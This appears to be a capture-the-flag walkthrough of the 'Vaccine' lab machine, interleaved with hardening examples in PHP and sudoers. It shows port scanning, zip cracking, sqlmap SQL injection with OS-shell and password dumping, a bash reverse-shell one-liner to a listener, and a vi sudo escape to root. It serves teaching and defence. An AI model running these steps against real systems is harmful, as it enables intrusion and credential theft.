Vaccine Walkthrough

After the Oopsie walkthrough, here I am with the Vaccine box. Let's hack it and grab the flags.

As I mentioned before, the Starting Point machines are a series of 9 easy-rated machines that should be rooted in sequence. That means that before you go through this box you must have completed the Oopsie machine.

Enough talk, 🥱 Let's Get It Started 🐱‍💻

Disclaimer: no flags (user/root) are shown in this writeup (as usual in writeups), so follow the procedure to grab them yourself! 🐱‍👤

00. Start Machine …

To start the machine, just click "Join Machine".

Then you can see the IP address of that machine; usually it is 10.10.10.46 🤠

Before going into the enumeration steps we can simply ping the IP address to check our VPN connection and whether the machine is alive. Sometimes a machine's firewall drops ping requests, but in most cases ping will succeed! 🙂

┌──(root💀Hidd3nWiki)-[~/Documents/Vaccine]
└─# ping 10.10.10.46 -c 2
PING 10.10.10.46 (10.10.10.46) 56(84) bytes of data.
64 bytes from 10.10.10.46: icmp_seq=1 ttl=63 time=235 ms
64 bytes from 10.10.10.46: icmp_seq=2 ttl=63 time=234 ms

--- 10.10.10.46 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1004ms
rtt min/avg/max/mdev = 234.325/234.560/234.796/0.235 ms

The ping reply shows TTL=63. There is only one hop between us and the machine (the VPN), so the packet started with a TTL of 64, the Linux default: this will be a Linux machine.

01. Enumeration First …

01.1 Fast ports scan

As usual, run a fast Nmap scan over all TCP ports to identify which ones are open.

nmap -n -vv --open -T4 -p- -oN AllPorts.nmap 10.10.10.46
-n     : Never do DNS resolution
-vv    : Extra verbosity
--open : Show only open ports
-p-    : Full TCP port range (1-65535)
-T4    : Aggressive (4) timing template; assumes you are on a reasonably fast and reliable network

Here is the output 👇

┌──(root💀Hidd3nWiki)-[~/Documents/Vaccine]
└─# nmap -n -vv --open -T4 -p- -oN AllPorts.nmap 10.10.10.46
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-19 23:26 EDT
Initiating Ping Scan at 23:26
Scanning 10.10.10.46 [4 ports]
Completed Ping Scan at 23:27, 0.41s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 23:27
Scanning 10.10.10.46 [65535 ports]
Discovered open port 21/tcp on 10.10.10.46
Discovered open port 22/tcp on 10.10.10.46
Discovered open port 80/tcp on 10.10.10.46
SYN Stealth Scan Timing: About 39.33% done; ETC: 23:28 (0:00:48 remaining)
Completed SYN Stealth Scan at 23:28, 77.77s elapsed (65535 total ports)
Nmap scan report for 10.10.10.46
Host is up, received reset ttl 63 (0.27s latency).
Scanned at 2021-05-19 23:26:59 EDT for 78s
Not shown: 65532 closed ports
Reason: 65532 resets
PORT   STATE SERVICE REASON
21/tcp open  ftp     syn-ack ttl 63
22/tcp open  ssh     syn-ack ttl 63
80/tcp open  http    syn-ack ttl 63

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 78.44 seconds
           Raw packets sent: 79277 (3.488MB) | Rcvd: 79253 (3.170MB)

Now we know which ports are open.

01.2 Run Nmap Scripting Engine

To get the most out of the scan we can run the Nmap Scripting Engine against the open ports. Since we already know which ports are open, we can point the script scan at just those three and it finishes much faster.

┌──(root💀Hidd3nWiki)-[~/Documents/Vaccine]
└─# nmap -sV -sC -oN DetailPorts.nmap -p 21,22,80 -Pn 10.10.10.46
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-19 23:36 EDT
Nmap scan report for 10.10.10.46
Host is up (0.24s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 8.0p1 Ubuntu 6build1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 c0:ee:58:07:75:34:b0:0b:91:65:b2:59:56:95:27:a4 (RSA)
|   256 ac:6e:81:18:89:22:d7:a7:41:7d:81:4f:1b:b8:b2:51 (ECDSA)
|_  256 42:5b:c3:21:df:ef:a2:0b:c9:5e:03:42:1d:69:d0:28 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: MegaCorp Login
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.44 seconds

There are 3 open ports. Looking at the SSH version info, the Ubuntu flavour is Eoan. There is also a website running on port 80, whose title Nmap reports as "MegaCorp Login". Let's look at what is inside the FTP server first.

01.3 Discover more on port 21

Do you remember that we got some FTP credentials from the previous box (Oopsie)? Let's try them against this FTP service.

  • ftpuser : mc@F1l3ZilL4

┌──(root💀Hidd3nWiki)-[~/Documents/Vaccine]
└─# ftp 10.10.10.46
Connected to 10.10.10.46.
220 (vsFTPd 3.0.3)
Name (10.10.10.46:root): ftpuser
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>

We successfully logged in to the FTP server as ftpuser. Let's enumerate again to see what else is there.

ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r--    1 0        0            2533 Feb 03  2020 backup.zip
226 Directory send OK.

There is a backup.zip file on this FTP server. Before we check what is inside it, let's download it to our machine.

We can use the get <filename> command to download any file from an FTP server. Click here if you need to learn the basic FTP commands. 😎😎

ftp> get backup.zip
local: backup.zip remote: backup.zip
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for backup.zip (2533 bytes).
226 Transfer complete.
2533 bytes received in 0.00 secs (8.5359 MB/s)

We can use unzip to extract a basic zip file. Here we can see an index.php file, but the archive is password-protected.

┌──(root💀Hidd3nWiki)-[~/Documents/Vaccine]
└─# ls
AllPorts.nmap  backup.zip  DetailPorts.nmap

┌──(root💀Hidd3nWiki)-[~/Documents/Vaccine]
└─# unzip backup.zip
Archive:  backup.zip
[backup.zip] index.php password:

We could try the passwords from the previous machines, but trust me, none of them work. That means we need to crack the zip password ourselves. There are many tools for cracking zip passwords, but I prefer fcrackzip.

To install fcrackzip, type the following command and hit Enter. 😁😁

apt-get install fcrackzip

If this is your very first time using the rockyou wordlist, you need to extract it first.

gunzip /usr/share/wordlists/rockyou.txt.gz
fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt backup.zip
-u : Use unzip to weed out wrong passwords
-D : Use a dictionary
-p : Use string as initial password/file

Here is the output 👇

┌──(root💀Hidd3nWiki)-[~/Documents/Vaccine]
└─# fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt backup.zip


PASSWORD FOUND!!!!: pw == 741852963

As you can feel, it's much faster than using John the Ripper, isn't it? Now that we have the password, let's unzip the archive to get the index.php file.

┌──(root💀Hidd3nWiki)-[~/Documents/Vaccine]
└─# unzip backup.zip
Archive:  backup.zip
[backup.zip] index.php password:
  inflating: index.php
  inflating: style.css

Oh! There is a CSS file as well. First of all, let's check the index.php file.

┌──(root💀Hidd3nWiki)-[~/Documents/Vaccine]
└─# head index.php
<!DOCTYPE html>
<?php
session_start();
  if(isset($_POST['username']) && isset($_POST['password'])) {
    if($_POST['username'] === 'admin' && md5($_POST['password']) === "2cb42f8734ea607eefed3b70af13bbd3") {
      $_SESSION['login'] = "true";
      header("Location: dashboard.php");
    }
  }
?>

Looking at the very first lines, we can see the credentials. The password, however, is stored as an unsalted MD5 hash. Let's try to look it up on the online CrackStation site.

Oh! What a simple password. So now the credentials are:

  • admin : qwerty789
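For comparison, here is an added hardened version of that login check (example code, not the box's index.php). It replaces the unsalted MD5 that CrackStation reversed in seconds with a password_hash() value, sets the HttpOnly flag that Nmap reported missing on PHPSESSID, and exits after the redirect; the hash constant is a placeholder.

```php
<?php
// Added example, not the box's index.php: the same admin login with the
// weaknesses seen in this walkthrough removed.
//
// Placeholder: generate the real value once, offline, with
//   php -r 'echo password_hash("<new password>", PASSWORD_DEFAULT), PHP_EOL;'
// bcrypt output is salted and slow, so a lookup table like the one that
// turned 2cb42f8734ea607eefed3b70af13bbd3 into qwerty789 does not apply.
const ADMIN_PASSWORD_HASH = '$2y$10$REPLACE_WITH_OUTPUT_OF_password_hash';

// Cookie flags must be set before session_start() creates PHPSESSID.
// Nmap's http-cookie-flags script flagged the missing HttpOnly bit.
session_set_cookie_params([
    'httponly' => true,     // not readable by JavaScript
    'secure'   => true,     // HTTPS only; the box serves plain HTTP, so enable once TLS is in place
    'samesite' => 'Strict', // not sent on cross-site requests
]);
session_start();

if (isset($_POST['username'], $_POST['password'])) {
    // hash_equals() compares in constant time; password_verify() checks the
    // submitted password against the stored bcrypt hash.
    $userOk = hash_equals('admin', (string) $_POST['username']);
    $passOk = password_verify((string) $_POST['password'], ADMIN_PASSWORD_HASH);

    if ($userOk && $passOk) {
        session_regenerate_id(true); // fresh session id after login
        $_SESSION['login'] = "true"; // same marker the original dashboard expects
        header('Location: dashboard.php');
        exit;                        // the original fell through and kept rendering the page
    }
    http_response_code(401);         // same response for a wrong user or a wrong password
}
```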

01.4 Discover more on port 80

Now let's jump to port 80. Here we have the MegaCorp login page, and we have the credentials, so let's use them to log in. What the hell, I think we could simply have got that password by brute-forcing the login page with the rockyou wordlist, couldn't we? 🤦‍♂️

Once logged in, there is only one function on this site: the search option. Let's fire up Burp Suite and look at the requests going through.

Looking at the request, a lot of possible vulnerabilities came to mind, but nothing worked except SQL injection.

02. Foothold

Let's jump to sqlmap. As you can see, the request is a GET request. You can simply put * as the value of the parameter you want to test (in this case search). Keep in mind that the search function is only reachable after logging in, so a valid session token is required and we pass our PHPSESSID with the --cookie option.

sqlmap 'http://10.10.10.46/dashboard.php?search=*' --cookie PHPSESSID=3gl7g1ujsq2i3cpigk4521lk8p --dbs --batch
--dbs   : Enumerate the DBMS databases
--batch : Never ask for user input, use the default behaviour

Click here if you need an SQLMap cheat sheet.

Here is the output 👇👇

Looking at the output, we can see that there are 3 databases. From here you can enumerate all the tables and dump data from them.
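The walkthrough never shows dashboard.php, so here is an added example (not the box's code) of the query pattern that makes a search parameter injectable beside its parameterized form, plus a connection set-up that limits what a successful injection can reach (relevant to the --os-shell step in 02.1). The table, column, database and role names are assumptions.

```php
<?php
// Added example, not the box's dashboard.php (the walkthrough never shows it).
// Assumptions: the search box filters a table named cars on its name column,
// the database is carsdb and the application connects as the role webapp.

// The pattern sqlmap exploits: the GET value is spliced into the SQL text, so
// the client controls the query grammar, not just a value.
function searchCarsUnsafe(PDO $db, string $term): array
{
    $sql = "SELECT name, type FROM cars WHERE name ILIKE '%" . $term . "%'";
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Fixed: the statement text is fixed at prepare time and the term is bound as
// a parameter, so anything it contains is compared as data. LIKE metacharacters
// are escaped as well, otherwise a lone % still turns the filter into "everything".
function searchCarsSafe(PDO $db, string $term): array
{
    $pattern = '%' . addcslashes($term, '%_\\') . '%';
    $stmt = $db->prepare(
        "SELECT name, type FROM cars WHERE name ILIKE :pattern ESCAPE '\\'"
    );
    $stmt->execute([':pattern' => $pattern]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Defence in depth for the --os-shell step in 02.1: the application must not
// connect as the postgres superuser. OS-level takeover through PostgreSQL needs
// superuser-only features (server-side file access, COPY ... FROM PROGRAM), so a
// role limited to SELECT on the search table cannot hand sqlmap a shell even if
// the injection itself is missed.
$db = new PDO(
    'pgsql:host=127.0.0.1;dbname=carsdb',
    'webapp',
    getenv('DB_PASSWORD'),
    [
        PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
        PDO::ATTR_EMULATE_PREPARES => false, // server-side prepared statements
    ]
);
$results = searchCarsSafe($db, (string) ($_GET['search'] ?? ''));
```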

02.1 Get User Shell

There are 2 main ways to get a user shell on this box:

  1. Using the sqlmap --os-shell option.

  2. Enumerating the database tables for credentials.

First, the 1st way: we can use the sqlmap flag --os-shell to gain a shell and then upgrade it to a proper reverse shell with the commands that follow. However, I sometimes lost the connection with this method. Anyway, try it out first; it's very simple. Type the command below in your terminal.

sqlmap 'http://10.10.10.46/dashboard.php?search=*' --cookie PHPSESSID=3gl7g1ujsq2i3cpigk4521lk8p --os-shell --batch

Then your shell will look like this 👇👇

Now it's time to upgrade that ugly shell. 🎅🎅 Start a netcat listener on whatever port you like (in this case 4848) and run the command below in the os-shell. 👇

bash -c 'bash -i &>/dev/tcp/<YourIP>/4848 <&1' &

Now the 2nd way: we need to enumerate the database to find users and their passwords. So let's get started.

Instead of enumerating the tables one by one, we can use the --passwords flag to dump the database users' password hashes directly. 👴👴 Pretty cool, right? 🤩

sqlmap 'http://10.10.10.46/dashboard.php?search=*' --cookie PHPSESSID=3gl7g1ujsq2i3cpigk4521lk8p --batch --passwords

So we found one user, postgres, with its password as an MD5 hash. I tried to crack this hash with john and hashcat, but a quick Google search can save some time (remove the leading 'md5' part of the hash first).

Now we have new credentials; let's check them through SSH.

  • postgres : P@s5w0rd!

I don't know why there isn't a user flag. Then I checked the statistics of this box and it showed me this. 👇

This means there is no user.txt on this box. Let's find root.txt.

03. Privilege Escalation …

First things first! Let's check which commands we can run with superuser permissions.

sudo -l

┌──(root💀Hidd3nWiki)-[~/Documents/Vaccine]
└─# ssh postgres@10.10.10.46
postgres@10.10.10.46's password:
Welcome to Ubuntu 19.10 (GNU/Linux 5.3.0-29-generic x86_64)
    <snap>
    </snap>
Last login: Thu May 20 06:33:36 2021 from 10.10.14.11
postgres@vaccine:~$ sudo -l
[sudo] password for postgres:
Matching Defaults entries for postgres on vaccine:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User postgres may run the following commands on vaccine:
    (ALL) /bin/vi /etc/postgresql/11/main/pg_hba.conf
postgres@vaccine:~$

Looks like we can run the command “/bin/vi /etc/postgresql/11/main/pg_hba.conf” as root through sudo. By running it and typing “:!/bin/bash” inside the vi editor, we get ourselves a root shell.
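The root cause is a sudo rule that hands out a full-featured editor as root. As an added defensive note (not part of the original walkthrough), here is that rule reconstructed from the sudo -l output above, with the user and host fields assumed, beside the rule that should have been written:

```sudoers
# Reconstructed from the sudo -l output on the page (user/host fields assumed).
# vi runs as root, and vi can run shell commands (the :!/bin/bash escape used
# above) and read or write any file, so this rule is equivalent to full root.
postgres ALL=(ALL) /bin/vi /etc/postgresql/11/main/pg_hba.conf

# Fixed rule. sudoedit copies the file to a temporary location, launches the
# editor as the invoking user (not root), and copies the result back only if
# it changed. A shell escape from the editor now yields a postgres shell,
# which the user already has.
postgres ALL=(ALL) sudoedit /etc/postgresql/11/main/pg_hba.conf
```

The sudo log entry (COMMAND=/bin/vi /etc/postgresql/11/main/pg_hba.conf) looks the same for a legitimate edit and for the shell escape, so the fix has to be in the rule, not in log review.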

Find me on @twitter
